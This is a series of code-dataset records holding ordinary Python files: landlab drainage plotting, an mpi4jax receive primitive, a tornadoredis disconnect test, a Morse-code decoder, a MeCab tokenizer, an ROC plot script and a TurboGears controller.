norm=plt.Normalize(0, tmax),\n linewidths=1.+10.*t)\n \n \n \n lc.set_array(t)\n plt.gca().add_collection(lc)\n \n \n plt.plot(x, y, 'b')\n plt.plot(mg.node_x, mg.node_y, 'r.')\n show()\nfrom landlab.components.flow_accum.flow_accumulator import FlowAccumulator\n\n\n\nfrom landlab.components.flow_director.flow_direction_mfd import flow_directions_mfd\n\nimport numpy as np\nfrom landlab import RasterModelGrid\nfrom landlab.plot.imshow import imshow_node_grid\n\nmg = RasterModelGrid((7,7), spacing=(1, 1))\nmg.set_closed_boundaries_at_grid_edges(True, True, True, False)\n_ = mg.add_field('topographic__elevation', mg.node_x**2+mg.node_y**2, at = 'node')\n\nfa=FlowAccumulator(mg, 'topographic__elevation', flow_director='D4')\nfa.run_one_step()\n\nimshow_node_grid(mg, 'topographic__elevation', cmap='viridis')\n#%%\ndrainagePlot(mg)\n\nsurface_values = mg.at_node['topographic__elevation']\n\n#%%\nelev = surface_values \nneighbors_at_node = mg.neighbors_at_node\nlinks_at_node = mg.links_at_node\nactive_link_dir_at_node = mg.active_link_dirs_at_node\ntail_node = mg.node_at_link_tail[np.arange(mg.number_of_links)]\nhead_node = mg.node_at_link_head[np.arange(mg.number_of_links)]\nlink_slope = - mg.calc_grad_at_link(elev)\nbaselevel_nodes = None\npartition_method='slope'\n#%%\n(receivers, \nproportions, \nsteepest_slope, \nsteepest_receiver, \nsink, \nreceiver_links, \nsteepest_link)= flow_directions_mfd(elev, \n neighbors_at_node,\n links_at_node,\n active_link_dir_at_node,\n tail_node, \n head_node, \n link_slope, \n baselevel_nodes=None,\n partition_method='square_root_of_slope')\n\n#%%\n\ndrainagePlot(mg, receivers=receivers, proportions=proportions)\n\n\n", "sub_path": "creating_MFD_directions.py", "file_name": "creating_MFD_directions.py", "file_ext": "py", "file_size_in_byte": 3649, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "landlab.plot.imshow.imshow_node_grid", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pylab.get_cmap", 
"line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 28, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.collections.LineCollection", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.collections.LineCollection", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pylab.Normalize", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pylab.gca", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 56, "usage_type": "name"}, {"api_name": "pylab.show", "line_number": 57, "usage_type": "call"}, {"api_name": "landlab.RasterModelGrid", "line_number": 68, "usage_type": "call"}, {"api_name": "landlab.components.flow_accum.flow_accumulator.FlowAccumulator", "line_number": 72, "usage_type": "call"}, {"api_name": "landlab.plot.imshow.imshow_node_grid", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 87, "usage_type": "call"}, {"api_name": "landlab.components.flow_director.flow_direction_mfd.flow_directions_mfd", "line_number": 98, "usage_type": "call"}]}
+{"seq_id": "330175736", "text": "import numpy as _np\n\nfrom mpi4py import MPI as _MPI\n\nimport jax.numpy as jnp\nfrom jax import abstract_arrays, device_put\nfrom jax.lax import create_token\nfrom jax.core import Primitive\nfrom jax.lib import xla_client\nfrom jax.interpreters import xla\n\nfrom ..utils import (\n to_mpi_ptr,\n _unpack_builder,\n _ops,\n _constant_s32_scalar,\n _constant_u64_scalar,\n dtype_ptr,\n)\n\nfrom ..warn import warn_missing_omnistaging\n\n# The Jax primitive\nmpi_recv_p = Primitive(\"recv_mpi\") # Create the primitive\n\n\n# This function applies the primitive to an AST\ndef Recv(\n x,\n source=_MPI.ANY_SOURCE,\n tag=_MPI.ANY_TAG,\n comm=_MPI.COMM_WORLD,\n status=None,\n token=None,\n):\n \"\"\"\n Recv(x, source=_MPI.ANY_SOURCE, tag=_MPI.ANY_TAG, comm=_MPI.COMM_WORLD, status=None, token=None)\n\n Receives the input`x` from the target rank `source` using the communicator `comm`\n which defaults to the world comunicator, with the `tag`.\n An optional token can be passed, which is used to force jax to execute\n MPI operations in the correct order.\n This is particularly important if you are performing different Send/Recv\n operations, which might otherwise deadlock.\n\n Argumemnts:\n x: Array or scalar input with the desired shape and dtype.\n source: rank of the source MPI process.\n tag: Tag of this message.\n comm: The communicator (defaults to MPI.COMM_WORLD)\n status:\n token: token to force a sequential order in the operations (default=None)\n\n Returns:\n res: the received array or scalar\n new_token: a new, modified token, that depends on this operation.\n \"\"\"\n if token is None:\n token = create_token(x)\n\n out = mpi_recv_p.bind(x, token, source=source, tag=tag, comm=comm, status=status)\n return out\n\n\n# this function executes the primitive, when not under any transformation\ndef mpi_recv_impl(x, token, source, tag, comm, status):\n # TODO: make this support gpus (use cupy?)\n out = _np.empty_like(x)\n comm.Recv(out, source=source, tag=tag, status=status)\n\n res = jnp.array(out, dtype=out.dtype)\n\n # if it's a jax array and not a standard python array\n if hasattr(x, \"device_buffer\"):\n # put the result on the correct device if needed\n if not (res.device_buffer.device() == x.device_buffer.device()):\n res = device_put(res, device=x.device_buffer.device())\n\n return res, token\n\n\n# This function compiles the operation\ndef mpi_recv_xla_encode(c, x, token, source, tag, comm, status):\n from ..cython.mpi_xla_bridge import MPI_STATUS_IGNORE_ADDR\n\n warn_missing_omnistaging()\n\n c = _unpack_builder(c)\n x_shape = c.GetShape(x)\n dtype = x_shape.element_type()\n dims = x_shape.dimensions()\n\n # compute total number of elements in array\n _nitems = _constant_s32_scalar(c, _np.prod(dims, dtype=int))\n _dtype_ptr = dtype_ptr(dtype)\n\n sh = xla_client.Shape.tuple_shape(\n [\n xla_client.Shape.array_shape(dtype, dims),\n xla_client.Shape.token_shape(),\n ]\n )\n\n if status is None:\n _status = MPI_STATUS_IGNORE_ADDR\n else:\n _status = _MPI._addressof(status)\n\n operands = (\n _nitems,\n _constant_s32_scalar(c, source),\n _constant_s32_scalar(c, tag),\n _constant_u64_scalar(c, to_mpi_ptr(comm)),\n _constant_u64_scalar(c, _dtype_ptr),\n _constant_u64_scalar(c, _status),\n token,\n )\n\n out = _ops.CustomCall(\n c,\n b\"mpi_recv\",\n operands=operands,\n shape=sh,\n has_side_effect=True,\n )\n\n return out\n\n\n# This function evaluates only the shapes during AST construction\ndef mpi_recv_abstract_eval(xs, token, source, tag, comm, status):\n 
return (\n abstract_arrays.ShapedArray(xs.shape, xs.dtype),\n abstract_arrays.abstract_token,\n )\n\n\nmpi_recv_p.multiple_results = True\nmpi_recv_p.def_impl(mpi_recv_impl)\nmpi_recv_p.def_abstract_eval(mpi_recv_abstract_eval)\n\n# assign to the primitive the correct encoder\nxla.backend_specific_translations[\"cpu\"][mpi_recv_p] = mpi_recv_xla_encode\n", "sub_path": "mpi4jax/collective_ops/recv.py", "file_name": "recv.py", "file_ext": "py", "file_size_in_byte": 4117, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "jax.core.Primitive", "line_number": 24, "usage_type": "call"}, {"api_name": "mpi4py.MPI.ANY_SOURCE", "line_number": 30, "usage_type": "attribute"}, {"api_name": "mpi4py.MPI", "line_number": 30, "usage_type": "name"}, {"api_name": "mpi4py.MPI.ANY_TAG", "line_number": 31, "usage_type": "attribute"}, {"api_name": "mpi4py.MPI", "line_number": 31, "usage_type": "name"}, {"api_name": "mpi4py.MPI.COMM_WORLD", "line_number": 32, "usage_type": "attribute"}, {"api_name": "mpi4py.MPI", "line_number": 32, "usage_type": "name"}, {"api_name": "jax.lax.create_token", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.empty_like", "line_number": 68, "usage_type": "call"}, {"api_name": "jax.numpy.array", "line_number": 71, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 71, "usage_type": "name"}, {"api_name": "jax.device_put", "line_number": 77, "usage_type": "call"}, {"api_name": "warn.warn_missing_omnistaging", "line_number": 86, "usage_type": "call"}, {"api_name": "utils._unpack_builder", "line_number": 88, "usage_type": "call"}, {"api_name": "utils._constant_s32_scalar", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 94, "usage_type": "call"}, {"api_name": "utils.dtype_ptr", "line_number": 95, "usage_type": "call"}, {"api_name": "jax.lib.xla_client.Shape.tuple_shape", "line_number": 97, "usage_type": "call"}, {"api_name": "jax.lib.xla_client.Shape", "line_number": 97, "usage_type": "attribute"}, {"api_name": "jax.lib.xla_client", "line_number": 97, "usage_type": "name"}, {"api_name": "jax.lib.xla_client.Shape.array_shape", "line_number": 99, "usage_type": "call"}, {"api_name": "jax.lib.xla_client.Shape", "line_number": 99, "usage_type": "attribute"}, {"api_name": "jax.lib.xla_client", "line_number": 99, "usage_type": "name"}, {"api_name": "jax.lib.xla_client.Shape.token_shape", "line_number": 100, "usage_type": "call"}, {"api_name": "jax.lib.xla_client.Shape", "line_number": 100, "usage_type": "attribute"}, {"api_name": "jax.lib.xla_client", "line_number": 100, "usage_type": "name"}, {"api_name": "cython.mpi_xla_bridge.MPI_STATUS_IGNORE_ADDR", "line_number": 105, "usage_type": "name"}, {"api_name": "mpi4py.MPI._addressof", "line_number": 107, "usage_type": "call"}, {"api_name": "mpi4py.MPI", "line_number": 107, "usage_type": "name"}, {"api_name": "utils._constant_s32_scalar", "line_number": 111, "usage_type": "call"}, {"api_name": "utils._constant_s32_scalar", "line_number": 112, "usage_type": "call"}, {"api_name": "utils._constant_u64_scalar", "line_number": 113, "usage_type": "call"}, {"api_name": "utils.to_mpi_ptr", "line_number": 113, "usage_type": "call"}, {"api_name": "utils._constant_u64_scalar", "line_number": 114, "usage_type": "call"}, {"api_name": "utils._constant_u64_scalar", "line_number": 115, "usage_type": "call"}, {"api_name": "utils._ops.CustomCall", "line_number": 119, "usage_type": "call"}, {"api_name": "utils._ops", "line_number": 
119, "usage_type": "name"}, {"api_name": "jax.abstract_arrays.ShapedArray", "line_number": 133, "usage_type": "call"}, {"api_name": "jax.abstract_arrays", "line_number": 133, "usage_type": "name"}, {"api_name": "jax.abstract_arrays.abstract_token", "line_number": 134, "usage_type": "attribute"}, {"api_name": "jax.abstract_arrays", "line_number": 134, "usage_type": "name"}, {"api_name": "jax.interpreters.xla.backend_specific_translations", "line_number": 143, "usage_type": "attribute"}, {"api_name": "jax.interpreters.xla", "line_number": 143, "usage_type": "name"}]}
+{"seq_id": "399641707", "text": "import socket\n\nfrom tornado import gen\nfrom tornado.netutil import TCPServer\n\nfrom tornado.testing import AsyncTestCase\n\nimport tornadoredis\nfrom tornadoredis.exceptions import ConnectionError\n\n\nclass DisconnectingRedisServer(TCPServer):\n @gen.engine\n def handle_stream(self, stream, address):\n n_args = yield gen.Task(stream.read_until, '\\r\\n')\n while n_args and n_args[0] == '*':\n yield gen.Task(stream.read_until, '\\r\\n')\n command = yield gen.Task(stream.read_until, '\\r\\n')\n arg_num = int(n_args.strip()[1:]) - 1\n if arg_num > 0:\n for __ in range(0, arg_num):\n # read the $N line\n yield gen.Task(stream.read_until, '\\r\\n')\n # read the argument line\n yield gen.Task(stream.read_until, '\\r\\n')\n stream.write('+OK\\r\\n')\n if command.strip() == 'DISCONNECT':\n try:\n stream.socket.shutdown(socket.SHUT_RDWR)\n stream.close()\n except socket.error:\n pass\n break\n n_args = yield gen.Task(stream.read_until, '\\r\\n')\n\n\n# RedisTestCase\nclass DisconnectTestCase(AsyncTestCase):\n test_db = 9\n test_port = 6380\n\n def setUp(self):\n #self._server_io_loop = IOLoop()\n # self._server_io_loop\n super(DisconnectTestCase, self).setUp()\n self._server = DisconnectingRedisServer(io_loop=self.io_loop)\n self._server.listen(self.test_port)\n self.client = self._new_client()\n self.client.flushdb()\n\n def _new_client(self):\n client = tornadoredis.Client(io_loop=self.io_loop, port=self.test_port)\n client.connection.connect()\n client.select(self.test_db)\n return client\n\n def tearDown(self):\n try:\n self.client.connection.disconnect()\n del self.client\n except AttributeError:\n pass\n self._server.stop()\n super(DisconnectTestCase, self).tearDown()\n\n def test_disconnect(self):\n def _disconnect_and_send_a_command():\n self.client.execute_command('DISCONNECT', callback=self.stop)\n self.wait()\n self.client.set('foo', 'bar', callback=self.stop)\n self.wait()\n self.assertRaises(ConnectionError, _disconnect_and_send_a_command)\n\n def test_bpop(self):\n def _disconnect_and_send_a_command():\n self.client.execute_command('DISCONNECT', callback=self.stop)\n self.wait()\n self.client.blpop('foo', callback=self.stop)\n self.wait()\n self.assertRaises(ConnectionError, _disconnect_and_send_a_command)\n\n\n#class ReconnectTestCase(RedisTestCase):\n# @async_test\n# @gen.engine\n# def test_redis_timeout(self):\n# res = yield gen.Task(self.client.setex, 'foo', 1, 'bar')\n# self.assertEqual(res, True)\n#\n# @gen.engine\n# def _get_delayed():\n# res = yield gen.Task(self.client.get, 'foo')\n# self.assertFalse(res)\n# self.stop()\n# self.delayed(2, _get_delayed)\n#\n# @async_test\n# @gen.engine\n# def test_redis_timeout_with_pipe(self):\n# res = yield gen.Task(self.client.set, 'foo', 'bar')\n# self.assertEqual(res, True)\n# pipe = self.client.pipeline(transactional=True)\n# pipe.get('foo')\n# res = yield gen.Task(pipe.execute)\n# self.assertEqual(res, ['bar'])\n# self.stop()\n", "sub_path": "tornadoredis/tests/reconnect.py", "file_name": "reconnect.py", "file_ext": "py", "file_size_in_byte": 3518, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tornado.netutil.TCPServer", "line_number": 12, "usage_type": "name"}, {"api_name": "tornado.gen.Task", "line_number": 15, "usage_type": "call"}, {"api_name": "tornado.gen", "line_number": 15, "usage_type": "name"}, {"api_name": "tornado.gen.Task", "line_number": 17, "usage_type": "call"}, {"api_name": "tornado.gen", "line_number": 
17, "usage_type": "name"}, {"api_name": "tornado.gen.Task", "line_number": 18, "usage_type": "call"}, {"api_name": "tornado.gen", "line_number": 18, "usage_type": "name"}, {"api_name": "tornado.gen.Task", "line_number": 23, "usage_type": "call"}, {"api_name": "tornado.gen", "line_number": 23, "usage_type": "name"}, {"api_name": "tornado.gen.Task", "line_number": 25, "usage_type": "call"}, {"api_name": "tornado.gen", "line_number": 25, "usage_type": "name"}, {"api_name": "socket.SHUT_RDWR", "line_number": 29, "usage_type": "attribute"}, {"api_name": "socket.error", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tornado.gen.Task", "line_number": 34, "usage_type": "call"}, {"api_name": "tornado.gen", "line_number": 34, "usage_type": "name"}, {"api_name": "tornado.gen.engine", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tornado.gen", "line_number": 13, "usage_type": "name"}, {"api_name": "tornado.testing.AsyncTestCase", "line_number": 38, "usage_type": "name"}, {"api_name": "tornadoredis.Client", "line_number": 52, "usage_type": "call"}, {"api_name": "tornadoredis.exceptions.ConnectionError", "line_number": 72, "usage_type": "argument"}, {"api_name": "tornadoredis.exceptions.ConnectionError", "line_number": 80, "usage_type": "argument"}]}
+{"seq_id": "209771507", "text": "#!/usr/local/bin/python2.7\n\nimport argparse\nimport logging\n\nfrom scripts import (add, edit_map, utils)\n\n\nFORMAT = \"[%(asctime)-15s][%(levelname)s] %(message)s\"\nlogging.basicConfig(format=FORMAT)\nlogging.getLogger().setLevel(logging.INFO)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('command', choices=['add', 'map', 'reset'])\n args, _ = parser.parse_known_args()\n if args.command == 'add':\n add.run(parser)\n if args.command == 'map':\n edit_map.run(parser)\n if args.command == 'reset':\n utils.upload(utils.create_url('reset'), None)\n", "sub_path": "Display/manage.py", "file_name": "manage.py", "file_ext": "py", "file_size_in_byte": 613, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.basicConfig", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 11, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 15, "usage_type": "call"}, {"api_name": "scripts.add.run", "line_number": 19, "usage_type": "call"}, {"api_name": "scripts.add", "line_number": 19, "usage_type": "name"}, {"api_name": "scripts.edit_map.run", "line_number": 21, "usage_type": "call"}, {"api_name": "scripts.edit_map", "line_number": 21, "usage_type": "name"}, {"api_name": "scripts.utils.upload", "line_number": 23, "usage_type": "call"}, {"api_name": "scripts.utils", "line_number": 23, "usage_type": "name"}, {"api_name": "scripts.utils.create_url", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "107933191", "text": "from loguru import logger\r\nimport cipheydists\r\n\r\n\r\nclass MorseCode:\r\n def __init__(self, lc):\r\n self.lc = lc\r\n self.ALLOWED = {\".\", \"-\", \" \", \"/\", \"\\n\"}\r\n self.MORSE_CODE_DICT = dict(cipheydists.get_charset(\"morse\"))\r\n self.MORSE_CODE_DICT_INV = {v: k for k, v in self.MORSE_CODE_DICT.items()}\r\n\r\n def decrypt(self, text):\r\n logger.debug(\"Attempting morse code\")\r\n if not self.checkIfMorse(text):\r\n return {\r\n \"lc\": self.lc,\r\n \"IsPlaintext?\": False,\r\n \"Plaintext\": None,\r\n \"Cipher\": \"Morse Code\",\r\n \"Extra Information\": None,\r\n }\r\n try:\r\n result = self.unmorse_it(text)\r\n except TypeError as e:\r\n return {\r\n \"lc\": self.lc,\r\n \"IsPlaintext?\": False,\r\n \"Plaintext\": None,\r\n \"Cipher\": \"Morse Code\",\r\n \"Extra Information\": None,\r\n }\r\n logger.debug(f\"Morse code successful, returning {result}\")\r\n return {\r\n \"lc\": self.lc,\r\n \"IsPlaintext?\": True,\r\n \"Plaintext\": result,\r\n \"Cipher\": \"Morse Code\",\r\n \"Extra Information\": None,\r\n }\r\n\r\n def checkIfMorse(self, text):\r\n count = 0\r\n for i in text:\r\n if i in self.ALLOWED:\r\n count += 1\r\n return count / len(text) > 0.625\r\n\r\n def unmorse_it(self, text):\r\n returnMsg = \"\"\r\n for word in text.split(\"/\"):\r\n for char in word.strip().split():\r\n # translates every letter\r\n try:\r\n m = self.MORSE_CODE_DICT_INV[char]\r\n except KeyError:\r\n m = \"\"\r\n returnMsg = returnMsg + m\r\n # after every word add a space\r\n # after every word add a space\r\n returnMsg = returnMsg + \" \"\r\n return returnMsg.strip().upper()\r\n", "sub_path": "ciphey/Decryptor/Encoding/morsecode.py", "file_name": "morsecode.py", "file_ext": "py", "file_size_in_byte": 1997, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "cipheydists.get_charset", "line_number": 9, "usage_type": "call"}, {"api_name": "loguru.logger.debug", "line_number": 13, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 13, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 32, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 32, "usage_type": "name"}]}
+{"seq_id": "154897630", "text": "#!/usr/bin/env python3\n\n\"\"\"分かち分け文書生成器\"\"\"\nimport os\nimport MeCab\nfrom iomanager import IOManager\nfrom file import File\n\n\nclass Wakachi(IOManager):\n \"\"\"分かち書きに関するクラス\"\"\"\n def __init__(self,\n input_path=\"./resource/file/\",\n output_path=\"./resource/wakachi/\"):\n super().__init__(input_path, output_path, \".txt\", \".wakachi\")\n self.hinshi_list = ['名詞', '形容詞', '動詞', '記号', '助詞', '助動詞', '接続詞', '副詞', '接頭詞']\n self.hinshi_kind = set()\n self.text = None\n self.results = []\n self.dict_word = {'名詞': [], '形容詞': [], '動詞': [], '記号': [], '助詞': [], '助動詞': [], '接続詞': [],\n '副詞': [], '接頭詞': []}\n self.stop_word = ['\\\\u', '。', '、', ',', '.', '0xe0', '「', '」', '(', ')', '=', \"-\", \"*\", '\"']\n self.stop_subtype = []\n\n def generate(self, is_force: bool=False):\n \"\"\"ディレクトリ内のテキストを全て分かち書きする\n @param is_force: trueなら上書き保存する\n \"\"\"\n for file in self.input.file_dict.values():\n write_path = self.output.path + file.name + self.output.default_extension\n if os.path.isfile(write_path) and is_force is False:\n continue\n self.generate_file(file, is_set_kind=True)\n\n def generate_file(self, file: File=None, is_set_kind: bool=False):\n \"\"\"あるテキストを分かち書きする\n @param file: 分かち書きするテキスト\n @param is_set_kind: trueなら品詞の種類を記録する\n \"\"\"\n if file is None:\n raise IndexError\n self.__open_text(file)\n self.__line_split(is_set_kind)\n self.__write(file)\n\n def __open_text(self, file: File):\n \"\"\"テキストを開く\n @param file: 分かち書きするテキスト\n \"\"\"\n with open(self.input.path + file.full_name, 'r', encoding=\"utf-8\") as file:\n binary_data = file.read()\n self.text = binary_data\n\n def token_split(self, tokens: object, is_set_kind=False)-> list:\n \"\"\"トークンを解析する\n @param tokens: MeCabで解析済の単語トークン\n @param is_set_kind: trueなら品詞の種類���記録する\n @return 単語のリスト\n \"\"\"\n r = []\n while tokens:\n w = tokens.surface\n ps = tokens.feature\n hinshi = ps.split(',')[0]\n self.hinshi_kind.add(hinshi)\n if hinshi in self.hinshi_list:\n if ps.split(',')[1] in self.stop_subtype:\n tokens = tokens.next\n continue\n r.append(w)\n if is_set_kind is True:\n self.dict_word[hinshi].append(w)\n tokens = tokens.next\n return r\n\n def __line_split(self, is_set_kind: bool=False):\n \"\"\"テキストを行ごとに分ける\n @param is_set_kind: trueなら品詞の種類を記録する\n \"\"\"\n def set_stop_word(_line):\n \"\"\"ストップワードの除去\"\"\"\n for _word in self.stop_word:\n _line = _line.replace(_word, ' ')\n return _line\n\n self.results = []\n t = MeCab.Tagger('-Ochasen')\n lines = self.text.split(\"\\n\")\n for line in lines:\n s = set_stop_word(line)\n t.parse(\"\")\n tokens = t.parseToNode(s)\n r = self.token_split(tokens, is_set_kind)\n rl = (\" \".join(r)).strip()\n self.results.append(rl)\n\n def __write(self, file: File):\n \"\"\"分かち書きした結果を書き込む\n @param file: 保存するファイル名\n \"\"\"\n wakachi_file = self.output.path + file.name + self.output.default_extension\n with open(wakachi_file, \"w\", encoding='utf-8-sig') as fp:\n fp.write(\"\\n\".join(self.results))\n\n\nclass WakachiMeishi(Wakachi):\n \"\"\"名詞のみの分かち書きに関するクラス\"\"\"\n def __init__(self,\n input_path=\"./resource/file/\",\n output_path=\"./resource/wakachi/\"\n ):\n super().__init__(input_path, output_path)\n self.output.default_extension = \".meishi.wakachi\"\n self.hinshi_list = ['名詞']\n self.stop_subtype = ['代名詞', '非自立', '数']\n self.stop_sub_subtype = []\n self.stop_word.extend(['_', '[', ']'])\n\n\ndef main():\n wakachi = WakachiMeishi()\n wakachi.generate()\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "app/spec2test/wakachi.py", "file_name": 
"wakachi.py", "file_ext": "py", "file_size_in_byte": 4664, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "iomanager.IOManager", "line_number": 10, "usage_type": "name"}, {"api_name": "file.name", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "file.File", "line_number": 35, "usage_type": "name"}, {"api_name": "file.File", "line_number": 46, "usage_type": "name"}, {"api_name": "file.full_name", "line_number": 50, "usage_type": "attribute"}, {"api_name": "file.read", "line_number": 51, "usage_type": "call"}, {"api_name": "MeCab.Tagger", "line_number": 87, "usage_type": "call"}, {"api_name": "file.File", "line_number": 97, "usage_type": "name"}, {"api_name": "file.name", "line_number": 101, "usage_type": "attribute"}]}
+{"seq_id": "494095631", "text": "# 2018.12.27: Receiver operating characteristic (ROC) curve\nimport sys\nimport numpy as np\n#import matplotlib\n#matplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n#=========================================================================================\n\nct_thres_list = [1.5,2.0,3.0,4.0]\nn = len(ct_thres_list)\n \nplt.figure(figsize=(3.0*n,3.2))\n\nfor i,ct_thres in enumerate(ct_thres_list):\n fptp = np.loadtxt('roc_av_40_100k_%s.dat'%(ct_thres)).astype(float)\n fp = fptp[:,0]\n tp = fptp[:,1]\n std = fptp[:,2]\n auc = tp.sum()/tp.shape[0]\n plt.subplot2grid((1,n),(0,i))\n plt.title('thres=%2.1f,auc=%5.4f'%(ct_thres,auc))\n #plt.errorbar(fp,tp,std)\n plt.plot(fp,tp,'b-')\n plt.fill_between(fp,tp-std,tp+std)\n plt.plot([0,1],[0,1],'k--')\n plt.xlim([0,1])\n plt.ylim([0,1])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n\nplt.tight_layout(h_pad=1, w_pad=1.5)\nplt.savefig('roc_av_40_100k.pdf', format='pdf', dpi=100)\n", "sub_path": "19.10.0911_protein_DCA_10_20k/4roc_av_plot.py", "file_name": "4roc_av_plot.py", "file_ext": "py", "file_size_in_byte": 980, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "numpy.loadtxt", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.fill_between", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}]}
+{"seq_id": "619244566", "text": "# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/engal/resourcecontroller.py\n# Compiled at: 2006-09-19 08:27:24\nfrom turbogears import controllers, expose\nimport cherrypy, logging\nlog = logging.getLogger('engal.resourcecontroller')\n\nclass Resource(controllers.Controller):\n __module__ = __name__\n item_getter = None\n friendly_resource_name = None\n exposed_resource = True\n\n @expose()\n def default(self, *vpath, **params):\n if not vpath:\n return self.index(**params)\n vpath = list(vpath)\n atom = vpath.pop(0)\n method = getattr(self, atom, None)\n if method and getattr(method, 'expose_container', False):\n return method(*vpath, **params)\n item = self.item_getter(atom)\n if item is None:\n raise cherrypy.NotFound\n self._addResource(item)\n if vpath:\n method = getattr(self, vpath[0], None)\n if method and getattr(method, 'exposed_resource'):\n return method(item, *vpath[1:], **params)\n return self.show(item, *vpath, **params)\n\n def _addResource(self, item):\n if not getattr(cherrypy.request, '_resourcecontroller', None):\n cherrypy.request._resourcecontroller = dict()\n cherrypy.request._resourcecontroller[self] = item\n if self.friendly_resource_name:\n cherrypy.request._resourcecontroller[friendly_resource_name] = item\n return\n\n def _getResource(self):\n return cherrypy.request._resourcecontroller.get(self, None)\n\n def _getResources(self):\n return cherrypy.request._resourcecontroller\n\n\ndef expose_resource(func):\n func.exposed = False\n func.exposed_resource = True\n return func", "sub_path": "pycfiles/engal-0.3.1-py2.4/resourcecontroller.py", "file_name": "resourcecontroller.py", "file_ext": "py", "file_size_in_byte": 1856, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "turbogears.controllers.Controller", "line_number": 11, "usage_type": "attribute"}, {"api_name": 